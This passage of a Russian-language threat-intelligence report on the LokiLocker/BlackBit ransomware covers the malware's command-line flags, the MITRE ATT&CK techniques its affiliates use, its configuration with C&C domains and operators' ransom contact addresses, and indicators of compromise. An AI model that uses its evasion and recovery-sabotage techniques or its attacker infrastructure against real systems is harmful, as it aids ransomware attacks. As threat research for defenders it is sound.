disabletask | Не используется |
nofuck | Не блокировать запуск Task Manager путем изменения значения параметра «DisableTaskMgr» в системном реестре |
nowol | В программах-вымогателях BlackBit не используется.
Не пробуждать хосты по сети, посылая сигнал WOL (Wake On LAN) |
shutdown | Завершить работу Windows после шифрования файлов |
norun | Не осуществлять шифрование файлов (Kill Switch) |
full | В некоторых образцах BlackBit не используется, в этом случае осуществляется шифрование всех файлов.
Шифровать все файлы, не пропускать файлы в соответствии с белым списком расширений. |
Заключение
Партнеры LokiLocker / BlackBit не демонстрируют в атаках изощренных и инновационных методов. Успех атак во многом связан с легкомысленным отношением жертв к защищенности своих внешних сервисов удаленного доступа. Программы-вымогатели LokiLocker / BlackBit хорошо известны антивирусным средствам и другим средствам безопасности, однако и это не спасает от шифрования данных с помощью этих программ.
Многие пострадавшие организации с легкостью соглашаются на выплату небольших сумм выкупа ради расшифровки ключевых хостов своей сети и быстрого восстановления ИТ-инфраструктуры. Впоследствии, отделавшись легким испугом, они лишь номинально исправляют ситуацию с безопасностью своего периметра от угроз ИБ. В будущем нельзя исключать, что такие организации могут стать жертвой более изощренных преступников с суммами выкупа совсем другого порядка.
Очевидно, что история вымогателей будет продолжаться до тех пор, пока есть условия для осуществления подобных атак, жертвы, готовые платить злоумышленникам выкуп, а также возможность получения злоумышленниками этого выкупа с помощью неотслеживаемых транзакций.
Поскольку миссия F.A.C.C.T. — это борьба с киберпреступностью и защита наших клиентов в киберпространстве, мы считаем своей задачей делиться своими находками с коммьюнити по кибербезопасности и призываем исследователей совместно изучать сложные угрозы, обмениваться данными и использовать наши технологии, как инструмент борьбы со злоумышленниками.
В этом блоге приведен подробный анализ инструментов, техник и процедур (TTPs) группировок, описанных на основе матрицы MITRE ATT&CK® (Adversarial Tactics, Techniques & Common Knowledge). Эти сведения будут полезны организациям, которые борются с киберпреступностью, а также руководителям служб информационной безопасности, SOC-аналитикам, специалистам по реагированиям на инциденты, а также компаниям, чья отраслевая принадлежность потенциально относит их к списку целей вымогателей.
Рекомендации
- Регулярно осуществлять установку критических обновлений операционной системы и используемых программных продуктов.
- Настроить стойкие парольные политики для локальных и доменных учетных записей. Убедиться в использовании различных паролей для локальных администраторов на всех хостах инфраструктуры.
- При разграничении прав доступа руководствоваться принципом минимально необходимых привилегий в системе, уделяя особое внимание сервисным учетным записям, а также учетным записям, используемым для выполнения автоматизированных задач и удаленного доступа.
- Запретить прямой доступ по протоколу RDP к рабочим станциям и серверам из-за пределов внутренней сети.
- Обеспечить надежную защиту средств удаленного доступа в ИТ-инфраструктуру, в том числе с помощью мультифакторной аутентификации.
- Ограничить возможность использования личных устройств сотрудников для доступа в корпоративную сеть, в том числе через VPN.
- Обеспечить глубину хранения журналов событий операционной системы и средств защиты информации не менее 3 месяцев.
- Настроить сбор Windows событий:
- успешных и неуспешных попыток входа;
- включение/отключение учетных записей, их блокировка;
- создание локальных и доменных учетных записей;
- добавление пользователей в группы, особенно предоставляющие повышенные привилегии;
- создание служб, процессов и задач в планировщике;
- изменение доменных и локальных политик безопасности;
- выполнение команд, при помощи различных командных интерпретаторов;
- критические срабатывания встроенного защитника Windows (Windows Defender);
- доступа к объектам общей сетевой папки;
- очистки журналов событий.
- . Реализовать централизованный сбор событий в Windows-инфраструктуре и их передачу в систему сбора данных (например: стек ELK, SIEM).
- Использовать для защиты конечных устройств решение F.A.C.C.T. Managed Extended Detection and Response (MXDR).
- Для контроля уровня информационной безопасности инфраструктуры организации использовать решение F.A.C.C.T. Attack Surface Management (ASM).
Реагирование на инциденты от F.A.C.C.T.
Мы устраняем инциденты любого масштаба и уровня сложности
Матрица тактик, техник и процедур (TTPs) LokiLocker и BlackBit на основе MITRE ATT&CK®
Tactic | Technique | Description |
TA0001
Initial Access |
T1133
External Remote Services |
В качестве первоначального доступа атакующие преимущественно используют публично доступный RDP |
T1078
Valid Accounts |
Злоумышленники использовали для получения доступа скомпрометированные учетные данные | |
TA0002
Execution |
T1106
Native API |
Программа-вымогатель для выполнения различных действий использует функции Native API |
T1053.005
Scheduled Task/Job: Scheduled Task |
Программа-вымогатель для запуска своего исполняемого файла создает задачу планировщика LokiLocker / BlackBit | |
T1059.001
Command and Scripting Interpreter: PowerShell |
Программа-вымогатель использует команду PowerShell для обновления групповых политик на компьютерах домена | |
T1059.003
Command and Scripting Interpreter: Windows Command Shell |
Атакующие используют Windows Command Shell для выполнения различных действий | |
T1047
Windows Management Instrumentation |
Программа-вымогатель использует wmic для удаления теневых копий томов | |
TA0003
Persistence |
T1053.005
Scheduled Task/Job: Scheduled Task |
Программа-вымогатель для запуска своего исполняемого файла при каждом входе в систему создает задачу планировщика LokiLocker / BlackBit |
T1078
Valid Accounts |
Полученные атакующими легитимные учетные записи используются для закрепления в скомпрометированной инфраструктуре | |
T1136
Create Account |
Некоторые партнеры для закрепления в системе создавали привилегированные учетные записи | |
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Программа-вымогатель для закрепления в системе создает свои копии в каталогах Startup, CommonStartup | |
TA0004
Privilege Escalation |
T1053.005
Scheduled Task/Job: Scheduled Task |
С помощью задачи планировщика LokiLocker / BlackBit, созданной программой-вымогателем, ее копия будет запускаться в контексте системной учетной записи |
T1078
Valid Accounts |
Атакующими для повышения привилегий используются легитимные учетные данные с правами администратора.
Существующие учетные данные администратора домена использовались злоумышленниками для продвижения по сети |
|
T1134.002
Access Token Manipulation: Create Process with Token |
Программа-вымогатель для повышения привилегий при запуске своих копий и команд оболочки использует функцию API ShellExecuteW с параметром «runas» | |
TA0005
Defense Evasion |
T1027
Obfuscated Files or Information |
Программа-вымогатель обфусцирована с помощью .NET протектора.
Программа-вымогатель для создания программы-обработчика открытия зашифрованных файлов компилирует с помощью Csharp содержащийся в ее теле исходный код на C# |
T1140
Deobfuscate/Decode Files or Information |
В процессе функционирования программа осуществляет расшифровку содержащихся в ее теле вспомогательных файлов и строк. | |
T1036.005
Masquerading: Match Legitimate Name or Location |
Программа-вымогатель использует для маскировки своих копий имя легитимного системного файла winlogon.exe, также одна из копий программы под данным именем сохраняется в системный каталог Windows.
В информации о версии, содержащейся в ресурсах программы-вымогателя, указаны в качестве имени файла svchost.exe, а в качестве компании – Microsoft |
|
T1562.001
Impair Defenses: Disable or Modify Tools |
Атакующие используют различные легитимные утилиты для нейтрализации средств безопасности.
Программа-вымогатель завершает процессы и службы, связанные с безопасностью и антивирусным ПО. Программа-вымогатель отключает Windows Defender и диспетчер задач (Task Manager) |
|
T1562.004
Impair Defenses: Disable or Modify System Firewall |
Программа-вымогатель отключает с помощью netsh брандмауэр Windows | |
T1070.001
Indicator Removal on Host: Clear Windows Event Logs |
Атакующие очищают журналы событий Windows (Event Logs) на скомпрометированном хосте | |
T1070.004
Indicator Removal: File Deletion |
Атакующие удаляют после использования свои ранее загруженные на хост инструменты | |
T1070.006
Indicator Removal: Timestomp |
Используемый злоумышленниками .NET протектор устанавливает в программе-вымогателе некорректную временную метку PE (PE timestamp) | |
T1112
Modify Registry |
Программа-вымогатель отключает на компьютере Windows Defender и диспетчер задач (Task Manager) путем модификации параметров системного реестра.
Также программа-вымогатель сохраняет в системный реестр свою служебную информацию в зашифрованном виде |
|
T1055.012
Process Injection: Process Hollowing |
В некоторых образцах LokiLocker содержится полезная нагрузка, которая может загружать программный модуль из сети интернет и внедрять его в качестве шелл-кода в процесс vbc.exe с помощью функций API CreateProcess, VirtualAllocEx, NtWriteVirtualMemory, NtResumeThread | |
TA0006
Credential Access |
T1003
OS Credential Dumping |
Для получения привилегированных учетных данных атакующие используют популярную легитимную утилиту mimikatz |
T1552
Unsecured Credentials |
Некоторые партнеры использовали для извлечения паролей утилиты NirSoft RouterPassView, PstPassword, VNCPassView.
Также некоторые атакующие использовали утилиту Everything для поиска аутентификационных данных в текстовых файлах |
|
T1555.003
Credentials from Password Stores: Credentials from Web Browsers |
Некоторые партнеры использовали для извлечения паролей утилиты NirSoft OperaPassView, WebBrowserPassView | |
T1555.003
Credentials from Password Stores: Windows Credential Manager |
Некоторые партнеры использовали для извлечения паролей утилиту NirSoft CredentialsFileView | |
T1110
Brute Force |
Злоумышленники используют подбор паролей для получения доступа | |
TA0007
Discovery |
T1018
Remote System Discovery |
Для получения информации об удаленных системах атакующие используют сетевые сканеры Advanced Port Scanner, SoftPerfect Network Scanner |
T1046
Network Service Scanning |
Для сканирования открытых портов в сети атакующие используют сетевые сканеры Advanced Port Scanner, SoftPerfect Network Scanner | |
T1087
Account Discovery |
Для получения списка пользователей в Active Directory некоторые партнеры пользовались утилитой LoginParser | |
T1135
Network Share Discovery |
Атакующие используют различные версии консольной утилиты NS для сканирования общих ресурсов сети | |
T1057
Process Discovery |
Программа-вымогатель перечисляет все запущенные процессы для поиска процессов, относящихся к безопасности, резервному копированию, базам данных, почтовым системам, офисным программам и т.д. | |
T1007
System Service Discovery |
Программа-вымогатель перечисляет системные службы для поиска служб, относящихся к безопасности, резервному копированию и базам данных. | |
T1083
File and Directory Discovery |
Для получения информации о файлах и каталогах некоторые партнеры использовали утилиту Everything | |
TA0008
Lateral Movement |
T1021.001
Remote Services: Remote Desktop Protocol |
Атакующие использовали RDP для дальнейшего продвижения по сети |
T1570
Lateral Tool Transfer |
При продвижении внутри сети жертвы и развертывании программы-вымогателя атакующие осуществляют копирование на хост необходимого набора инструментов.
Программа-вымогатель LokiLocker может самостоятельно распространяться в сети с помощью загруженной из сети интернет утилиты PsExec |
|
TA0011
Command and Control |
T1105
Ingress Tool Transfer |
После получения первоначального доступа атакующие копируют на скомпрометированный хост набор необходимых инструментов.
Программа-вымогатель может самостоятельно загружать из сети интернет утилиты PsExec и mimikatz |
TA0040
Impact |
T1485
Data Destruction |
Программа-вымогатель после истечения срока выплаты выкупа уничтожает все данные на компьютере |
T1486
Data Encrypted for Impact |
Программа-вымогатель осуществляет шифрование файлов на всех дисках и на общих сетевых ресурсах | |
T1489
Service Stop |
Программа-вымогатель останавливает службы безопасности, резервного копирования, баз данных и т.п. | |
T1490
Inhibit System Recovery |
Программа-вымогатель удаляет с помощью vssadmin и wmic теневые копии томов (Windows Volume Shadow Copies), отключает с помощью bccedit восстановление в загрузочном меню Windows, удаляет с помощью wbadmin резервные копии состояния системы, а также останавливает службы резервного копирования | |
T1491.001
Defacement: Internal Defacement |
Программа-вымогатель устанавливает в качестве обоев рабочего стола скомпрометированного хоста изображение с информацией о шифровании файлов, также помещает текст с информацией о шифровании файлов на экран входа пользователя в систему | |
T1529
System Shutdown/Reboot |
Программа-вымогатель может завершать работу системы после окончания шифрования файлов |
Конфигурация программы-вымогателя
C&C |
application-api.xyz
369828d7529322365c2ef3568e4256b9a40555cc2b2a041fff.buzz |
Расширения зашифрованных файлов |
.BlackBit
.KTBR .onion700 |
Имя файла записки с требованием выкупа |
Restore-My-Files.txt |
Публичные ключи RSA |
<RSAKeyValue><Modulus>3YeF6G9OuKHpAHmCVUXmol8PLYrhDlXBoEFQK2qTRE4hNgm8QbWccZTFpvNpjJ4Q4zZ5ozpHYRZyvLU6AWGXhX3BOrpOcdtxc50l2IgtzU3rogCzQtFhLi2avnEIYBaAv+/tXHp9W5bvWvek2jWdpIUWEwGQA3j7uSJCOurVCpvGhLOc9AM6wuSOuOo45WvYgVOEqwO3XvILOUcjrzvFsrqtzytSn7gdzP3pjf8xbXD6vbXJpkGDLxdIa1swtBmUFrO8198fAAucT7Sl9O1uqGJK3SUYcxthaUvqmtESc5VrKa85jzqEDPF9MUiFfUBVPhYD4AhziroOyWJtj8KYCfY4Wy768+oO2qu/Ts/oBgBmP6pOPg49jfNHc56HxKVRCBiuSc7RGsGKGVHrEHr//BOkWFDD32RVAwEVHTbYqFHJbLledzYJhUEAuP/zsKCSfL83jVFmVPEmvEkjBqbr61OOQH8yJtz/0QusFTTMV3Hm9UmgOIgBA2vxVXGUBhHR5RBoTqc4mhOFlM9gXjfcxfFW4zZrvQ2OVoc+gg7/zsWKed4QAzb7z4pfvtGifiF7UEdFbCtFMbmTqjr3jI3aREp2Jt+3BHPsUP25bGwylirv82qt25i5gGgquYYGxP+lNlSrzHD+9059+wLF0sGgMfdd3JZHRTIehyu9cny0YeE=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> <RSAKeyValue><Modulus>r+Cxt62Xi5EX9VXtC29NfCEQbSvMV08UVDO89AQG3rAsHUbt0rlcJzZYOyCRoGDusFNTLElbZD64+lqyF4jRMNgqCX1kBTzMo+2MYT/oIcPvLW0HHiSo8jYZl4GXJI7F3Om2IH4vW/1cvUUqQ2VFvIMk4m38jUfslWFaD/NAW3O0Hta+k4j9Qnz0qjZjbOmJsp+3IQ9bgjghd77WRwrXaxc0amFrC1n3lUVVTFzkbolh7z1U848kLTPFYOr7d57bA+C8BvhO/wBu6rA9MDQxtk+ZdfEdYj822NhR+5ipmJ35ALUmYoAFZ415gypghqp+uf0zM+nuJxI90BJJOHwsjQ8EyA7qvOFKP9rMC2wRAecalX9mR+oE73jJ49HuuetcZJZT0eRnIvmaEEinwk3KHaXdR2qRqZXXE6+ebFvWBiurYBCO2flMykCdeEjuVR3HE91J8UTc8FZzDLjepHzmuD5OWC7EDhJ0mrbhthlwW2LOUnp4xnOKEo0Tf5jl2SQeAOnDnayVTsV4sSInbwws6aa6g1//YDUg+4UoTWStsWEFjrxkJEZfc5sBBH/I1g34sFnscaxMErsPr6yZ/JtUJiC1uH3I1ZA6ERszWqXQoTH6zfoM0iGWyjCchkyGokHIdVGHM0hXCDJT3nIcfKWJ+zsBGrZGvI2XkWikO0E92OU=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> <RSAKeyValue><Modulus>02Syigmk0f0blBtVJ1v9Cce3cLV+7TgBWvlxddy2feJ5URIYE7S+3iPymL/uQkcqFvZCWJAZVgjWldb4F9LURBFuoEpvxdVTZ0s4bnbWKcn5H9W9DsY7O1inCSH4JqbjrGxax6WcmlgDXh+5aS6YnYDlfDaRuspz/wePV6T+U+KOuEr3eiUP8Qq83QAzCGdKU5X4dsIx6qJL8TYfqFwrob4+nOZMileaRFjror4yzkEzdR425i/qV1fNb4SN2KM5j8NWfFfc6Va/cYjykcPLEJ69JGUwH9OotL/x6+ED6UCsWM/g90pCPqIUpEel3kD4j9Y1Pw5qGH2mkZ1RJfkFDB32w5ytdeM/N/PyFPTY4wlpgjU8Rpzl77O/Wx1w/iqVP2RLN4ku0hGIsefhDQ0FgxobQgiM+AzZsb+GlTh7LR9Eb5ShRysZ3qvKiT9I1NBtJedPPD2QF8wO2jt+/G/AjmRaM5B8nFVPwoq85jPMV1f+2oUjtNmO1KTilaU3c8b7kjjdTTESdbs06ysyNhWxKM+axbZlO1K5KFi2fKx2ZDQ5+wlzKbL/MdTuvWdX0YEu4HAJfpqVYfhtepa+vB94K8AnNMgpHemIwB7DawOn9eQyE3etPIcdzo8bOi7hWMPnOABvqfvuY54ojSNam+lcrA3AuMRDcq5LUBGX74cPYXE=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> <RSAKeyValue><Modulus>uqMAPuDEfy3qFvDhRTGTPEINTPzjvn8wjZLdeW7g4Axf1RUvI0uEfAL7n+Ikx+ri/OMguc6sUoJYAOvcNXgiCWwvk8Se1QSyj27wRyTRtOg8H4bBML/V5SLAZ82VOd0NenLQ0WF3zZ0q6dUlvrwoayOs4QOzefQoDHcCgzHHI9yU40d1BXxr8rlcSfwpdJGN7IoQuSqRSK3M4ZBd0Y5Ll7f+W/QyMStCPzwRdVQAlOJe9trRe7ZEaPlbwQiEBUP2D+6b1j3s4LoXDvkhraVcsf89jsTV4DkYZv/qv69TLgkAx5slo3/tpT/3GAYBX4CHw3STo4h5ZMtqkcTtQXX6Ea4W32BG2zLDJVuEGKQxng7uKFXirJt2JvHPEzUIeitoHDqIDtN9nznWeacs3wECCvMPYziLcpxnrCCgLqTY3bnRyVRcIBpKMWFH3BhcWU3amv1BNt+dPJsLez8O6tYdCb00erHsUak2ljEAIVQJ8jFp+zuIlg8lEaqlcMyrv2d9oIJUh0sy3nBDL64HMPSXWDOOt6vTlAQ827g80pY90sG15ho1Hulk37WkdA0Xc7omR8XMs/kxgrX19/e6XPng8LebFdqSsfuzEVtuWzBnD/xpWHVow/Ve/UKtZ2ySbeh+da1Ejfk8jTfJxdJxURoBm9UGZO/EDECdBB1LUEHJTy0=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> <RSAKeyValue><Modulus>8pH0ixvlkHdrtmqKeTSJ5JbAWv3UNBOkSRNIBWpr8wUlPGsF5UealBIUNDyDvMMFtfe4qKC6KO0j223h7VjXHVlKcCj/U1HEo29DfjZDXsimMxXpk4sOJAFchhcAbHqPjUbez9I+XhyvUdnMzqMm1PKh5CAMyh1B7xwdUwi7TL6fDrozjnd12DTvUARbMeNPoMSuMh75EesSZxsxlZRKqGNiFmj/pg46/9HcSHL6Hb8N1rhFYjLSQ+9utpkBrVaGe163ihqBxD3pBIvZ/7SGWSwaxbFPOEs1dvt7dU33XuNzd9hiPoOY8PLJL/HzUHuCntmq50oeggtudKh4X9agblEz/5fuPUQmnWUErYj3tQ/ETCLRn8mTWq7K7tLQJI8IjDAosYKRRKKDG70DIE5l5XFS3zhzQtIRMtuY9S04s43ges6kCoh/0eBFW60DIkSqzS0UCJ/NfBAcf7jLAm8KR7NfHXAT7DK4s6Hkqh9Y3JTaZp5VIN3wo58CrJNvPb/h</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> |
- 2pac
- medoosa@onionmail.org
- medoosa@msgsafe.io
- 2pac
- Onion749@onionmail.org
- onion746@onionmail.com
- 7766
- encrypt.ns@gmail.com
- decrypt.ns@gmail.com
- abinv
- f5tiger@cock.li
- f5tiger@msgsafe.io
- ivt1
- F5Tiger@tutanota.com
- F5Tiger@msgsafe.io
- BaronMonkey
- BaronMonkey@onionmail.org
- BaronMonkey@cyberfear.com
- Telegram: @BaronMonkey
- BigSmoke
- Unlocksard@zohomail.eu
- unlocksard@mailfence.com
- darkages
- BlackBitSupport@onionmail.org
- Telegram: @RecoverBlackBit
- decrliv
- decrliv@aol.com
- decliv@aol.com
- dmc1
- drk00on@onionmail.org
- drk99@onionmail.org
- drclkk0
- drclkk0@msgden.com
- drclkk00@msgsafe.ninja
- GreenMonkey
- GreenMonkey@onionmail.org
- GreenMonkey@cyberfear.com
- Hm1122
- spystar@onionmail.org
- spystar1@onionmail.com
- Telegram: @Spystar_Support
- HMD1122
- roxiyo@onionmail.com
- roxiyo1@onionmail.com
- Telegram: @Roxiyo_support
- invkb
- Help2You@cyberfear.com
- Help2You@cock.lu
- itmarmin
- suppdecrypt@onionmail.com
- arsupp@tutanota.com
- Lastsmile
- Filesupport@airmail.cc
- unlockerhelp@onionmail.org
- Lastsmile
- Blackbit@onionmail.org
- Blackfilesupport@firemail.cc
- mdr1
- DecodeMDR@Outlook.com
- Decodemdr@aol.com
- Telegram: @spicy_Support1
- mosnar
- mosnar@onionmail.org
- mosnar@cyberfear.com
- MrFox
- 3ncrypter.m4n@gmail.com
- 3ncryptionfile@gmail.com
- qmwy121
- qmwy121@yahoo.com
- qmwy121@mail2tor.com
- Ricky_Monkey
- RickyMonkey@onionmail.org
- RickyMonkey@cyberfear.com
- Telegram: @Ricky_Monkey
- rrr3
- Trustmebb@keemail.me
- Falcon360@cock.li
- spicy
- spicy@onionmail.com
- spicy1@tutamail.com
- TrxUser
- TrxFiles@tutanota.com
- TrxFiles@onionmail.org
- U1542
- howrecover@tutamail.com
- recover1@cock.lu
- user163
- kallit3rmux@gmail.com
- dr.resetfile@gmail.com
- dr.help780@gmail.com
- dr.locker780@gmail.com
- GhostTM@zohomail.com
- falcon360@cock.li
Индикаторы компрометации
089efde9906a483ca3dcc9edaede9cd3a92dee2fea983113ee673c09d919ca82
0d144b885ff9e8a8c52410c3e1bb80ae06c5f54abf81836e048425945e8658c0
16dae8bde25111bf592340342fc620277584673caad560e5f5d7bb970c47da70
1d0930fed7eb72f1338b0aed0d47e72731cd599200d83058aec2fd9825fa71c8
2cc1a64ed6a8157ff91691e99cba2cf16b6040e36d6bbae398d8c27712eb73ae
2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21
33eff5a62ed6ede2c5b4a640a7ad0bca6be4326886acf45bc9159177b05b7d28
35e0dc397215dba3fe472487fbce1f4266a53eebdbdd50b8380cfcf08c8bed85
3651c16b6c3077216f07219fdc79503f999c1a60a8552c58317520a15a7586d5
3b01e134b1b88d33914bc02fd1dbf20193083e464a659ad7a3026075e6dc058d
43c6aef23a90c742274d6db2148a5cb5027c82e94ba2db4ae4b4184956e370b5
43cb03f8ec04adead217700808f116ffb872581a7b343fca8becedf67400834a
4791d791affeda2c02122de107afb3bb9394c89869b2196a583693ebb609174d
49088d480254791c2e8466738d984a5c9411f159e8cf4f5e5f2c696a54e248a8
4d07236652dce7451ef14b1101172f4a041943fed087693477c538e0041040b0
50ab947d4556ce41fcd02eeb5189616265d5135e266da28ff3f96b8ce0d76676
6eae5f256537af00c1f53ee711d0bdd9ff1e9ccf771234f74c9fc58bfb63c8fa
70ed435b9f05d9f80eda155e87bd22709423e492ac485e0c1e057cc0706c7fd6
71b3fe6294847652c62d9d3f53ba8b802c603a9a4c51ace644cc1152de28537b
8209b64a1d6982efbe3ff4924e17a9b07db3d8f0d71f4c8eee2bc68f231dca23
9c961940a28b17a7e2e6027ebe71a383340a9ba8cf0d6d4a5a2b5ddc0d410671
9d0509d9fceb37430146d5b34645c62c5b87dd2cc0c7da6d64800ec3711f41ea
ac62397f364d83a8f9706ee6bb1db5b6f8d023f032a7f7f50778ca50aa5c702e
ad0edd2bac12a5710015b2c2e83e3416b38997c91edfe327344d1b56f6e9f035
ada91241f13e557ef7d88a33e293b62677d4445068c90fabd247eb8824d1d6a4
b155fbcc84d038e3c7d27b25a2c3e13f974c05ed9b9c4d370cc5099a3fee4e8a
b3324b629febeefb17201abb52bc66094b4ffb292f8aa3a549f39e7e11c63694
b8ffd72534056ea89bfd48cbe6efb0b4d627a6284a7b763fdb7dfd070c1049ba
bae24fba731771acb390f44117ae9c5878e34a47f0f4e44e8b89db3ecbd1b8ba
ca44a12a109d4e755abe10941853e576322709f69f75ce7ce7c2cbbfd19f1676
ca95ceeb9c3cc95f71b0e1c133fee12e5030d21f141a1d4dc8c0c1804ae296c1
cd29a952a51204f2e8744271b822c277b63ad8a54e3a6422e342eb9c53df0bda
d1080a9f2b1de6d51ca8a73fa3471f7ed375425f8705bb531302382ff32e6041
d33aaec9d3ae5fc7165520c42d9284c26729ebf3f196498575fc85151e2b9e41
d7e8e14ddd625fe429209ee7058bf8c669bc71cf82b72fb344851baac30e1e69
d89731c02d302e51bc5fd4091070d7f3dd3c086a1ff111e53bfb7ab24ceea7a7
e32437c4978ec158bcadef18829207caa7db36108d7813db2f0098cc003a1533
fd7befc14e82c66206160728cc4d7874a05de89af52145171b57e404bbc71c3c
application-api.xyz
369828d7529322365c2ef3568e4256b9a40555cc2b2a041fff.buzz
(User-Agent: «BlackBit/1.0«)
http://tb28.trainbit.com:8080
369410a00ec51edbf8d3f30c895b7c31f88955a3cc0442c7ff043fc049efb0c2
0c620b4f227192396952bf24133436ff53c287a83e8c0669a115515ee3daaf75
0dee659fa261ed1e59af043e8d5abcda6a3189c4b4b040748eba6dfa4c54ee96
14322e09195ff302868ab26fb2a4105b153f68adcf6065870828b8e66e8a89fa
26d16bc63c093fbde017865985b44a61b1f8e1240bc7459f1d1222eeea2cc4a1
27f70a597819317d551f553d9adf6510f63180a65e9faff08d8384a22f8b6779
2f15bbcce80d6d1d8297c52285f43ea0b57b9e4ce4bc2ddfaba68151fae6ac86
3a86c1b256e89071984b8edfe1e8956546865db4a646b16a85f8fd81363f02f8
480e45969f51bd5ebcac743bc2ce0731e602beac8065872902dd4715b825cf88
493d7776e36d172cf689ed4cae759a10b10a545297192690fa9fb240a813ad9c
7af437fb6563f0b3fcb1b85d1b4174968c3d15476d994a9a3e3d19c6ca661fb8
7e0b15139ba2d3c8a7954ab66ad90172ec7a1235f360cea538f04632d43d4fc1
8990cbb68b201ba882a87771f63f4dba38be1db0a8ddda70450c3616bdb8afd6
90fad61307312b14eb86e5b64a516392a113ce08a0d30f7b5d402e3934375ec7
92c4d7a9c487470147f19e631a52bdac93c0240bcedd5bf10e66813c1ce220f8
c0bd0231864779c6595c3eb81d7795e56e9222c99bcb3bb170c1e0ca87f1c519
f0c572bdfdabfa8b229a171aba291fb96fb38f496c83d868c64acd5706ab7c19
f4b33470a9e638b3c6c79cff68bb5adfac299d9ab5d13a672a1c0e9e789b7107
82b4c91f5efff6db70f9b9317e6a79a43705f0936ba28e819c5b64f902a04add
08837c088cd74facf6e840f23bbd2815cba4ec9835d7910ec73268b2b8f3af7a
0923ac3185f9200912d9a2ef021b7cc0f44fb17fd3049441a2a83405c8a28637
37885d585b468715c5f0fe50a680da176390064c8d0c6f36a880b8836510a24f
3a86c1b256e89071984b8edfe1e8956546865db4a646b16a85f8fd81363f02f8
50e977d55c56ebb2aa757a64901a89a4bdc2637e6aa2da0aafa6b436ab2093c0
562b415c46e5607463d38711cfdd253558410610c6a14d4d0b685f356df865e6
950dcaef8b0226265e3e0281b079d4a870a73c13e76109be701032cd42b1a291
970e56c2abce804b10ca85e5e767c2b97ea3340823ebcd69a5e9cbe9ca7d9b59
99982c4ed7fcf0b7917f4ab47bab81444370868f7f60fe1a32ffc7871cb30c8a
e370db365086148c530dd9f6c3a6abb9da04b031ab17811ecab732c1eb44e6f6
c9b1665e58fe0bd5a47bac14d7f262fcb21a90775c97bd778288c21eaac7435b
d0010996ee1ea4dc93d327eb3955cc1c8f56f7b9e7eea87206c25982fe7bbfe2
a565488462c379a6db5c28023ca52cecdd56887ec78059e7e24a5eadde8ed502
df87bd63cd337c1f25e82fb6a71f75a3ff279ac0dcb12f31d8972fa7c13c6334
13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377
1c2ef6f033059176cfe02ce284b6ac46baae9c3ec1d64cca001064cce10c9c39
782f81bd21c84ba434d3ab489d9cdb85e373e11cfa1d5a73d8ea1746ed3f63d2
loki-locker.one
(User-Agent: «Loki/1.0«)
http://lokifiles.com/
http://imagesource.zapto.org
157.90.17.53:7300